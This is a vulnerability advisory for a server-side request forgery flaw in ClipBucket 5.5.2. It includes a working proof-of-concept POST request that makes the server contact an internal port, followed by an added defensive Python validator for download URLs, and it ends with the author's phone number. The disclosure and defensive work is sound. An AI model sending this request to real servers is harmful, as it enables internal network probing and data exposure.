# Exploit Title: ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
# Google Dork: N/A
# Date: 2025-09-11
# Exploit Author: Mukundsinh Solanki (r00td3str0y3r)
# Vendor Homepage: https://clipbucket.com
# Software Link: https://github.com/MacWarrior/clipbucket-v5
# Version: 5.5.2 Build #90
# Tested on: Ubuntu 20.04 LTS, PHP 7.4
# CVE: CVE-2025-55911
## Vulnerability Description:
An authenticated user with regular permissions can exploit a Server-Side
Request Forgery (SSRF) vulnerability via the `file` parameter in
`actions/file_downloader.php`. By supplying a crafted URL, attackers can
force the server to make arbitrary HTTP requests to internal services or
external systems. This can lead to internal network enumeration, data
exfiltration, or pivoting attacks.
## PoC Request:
```http
POST /upload/actions/file_downloader.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=validsession

file=http://127.0.0.1:3306/test.mp4
```
The server attempts to connect to the internal service (`127.0.0.1:3306`),
demonstrating SSRF.
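The fix on the server side is to validate the `file` URL before any fetch is made. The following is an added example (it is not ClipBucket code and is not the vendor's patch) of the allowlist-style check a defender would place in front of a server-side download: it accepts only `http`/`https` on ports 80/443, rejects embedded credentials, resolves the host to every address it maps to, and refuses the URL if any address is loopback, private, link-local (which covers cloud metadata endpoints), multicast or reserved, including IPv4-mapped IPv6 forms. The hostnames, addresses and the `FAKE_DNS` table are constructed so the demo runs offline; `validate_download_url`, `is_public_address` and `resolve_all` are names chosen for this example.

```python
"""Allowlist validation for a user-supplied download URL (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host):
    """Real DNS lookup returning every address `host` maps to.

    An IP literal is returned as-is. All addresses are returned so the caller
    can reject the URL when *any* of them is non-public (dual-stack hosts).
    """
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    infos = socket.getaddrinfo(host, None)
    return sorted({info[4][0] for info in infos})


def is_public_address(ip_text):
    """True only for a globally routable unicast address.

    IPv4-mapped IPv6 (::ffff:127.0.0.1) is unwrapped first so the IPv4 rules
    apply; loopback, private, link-local (169.254/16, cloud metadata), multicast
    and reserved ranges are all rejected.
    """
    addr = ipaddress.ip_address(ip_text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not (addr.is_multicast or addr.is_reserved)


def validate_download_url(url, resolver=resolve_all):
    """Return (ok, reason, resolved_ips); `resolver` is injectable for tests."""
    parts = urlsplit(url)                      # urlsplit lower-cases the scheme
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme '{parts.scheme or '<none>'}' not allowed", []
    host = parts.hostname                      # brackets stripped, lower-cased
    if not host:
        return False, "missing host", []
    if parts.username or parts.password:
        return False, "credentials in URL not allowed", []
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port", []
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed", []
    try:
        ips = resolver(host)
    except OSError:
        return False, "hostname does not resolve", []
    if not ips:
        return False, "hostname does not resolve", []
    for ip in ips:
        if not is_public_address(ip):
            return False, f"{host} resolves to non-public address {ip}", ips
    return True, "ok", ips


# Constructed name-to-address table standing in for DNS (keeps the demo offline).
FAKE_DNS = {
    "cdn.example": ["93.184.216.34"],               # sample public address
    "cloud-metadata.example": ["169.254.169.254"],  # link-local metadata range
    "dual.example": ["93.184.216.34", "::1"],       # one public, one loopback
}


def fake_resolver(host):
    """Offline stand-in for resolve_all using the constructed table above."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    if host not in FAKE_DNS:
        raise OSError(f"NXDOMAIN {host}")
    return FAKE_DNS[host]


# Constructed inputs; the first is the advisory's own PoC target.
SAMPLE_URLS = [
    "http://127.0.0.1:3306/test.mp4",
    "http://127.0.0.1/test.mp4",
    "http://[::ffff:127.0.0.1]/test.mp4",
    "http://cloud-metadata.example/latest/",
    "http://dual.example/video.mp4",
    "ftp://cdn.example/video.mp4",
    "http://user:pw@cdn.example/video.mp4",
    "https://cdn.example/video.mp4",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        ok, reason, _ = validate_download_url(u, resolver=fake_resolver)
        print(f"{'ALLOW' if ok else 'DENY ':5} {u:42} {reason}")
```

Two caveats apply when wiring this into a real fetch: connect to the address that was validated rather than letting the HTTP client resolve the name a second time (otherwise a DNS rebinding between check and use defeats the check), and re-run the validation on every redirect target, since the first response can point the client at an internal address.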
## Impact:
- Internal service enumeration
- Potential metadata leakage
- Pivoting to internal systems
Regards,
Mukundsinh Solanki
+916355251151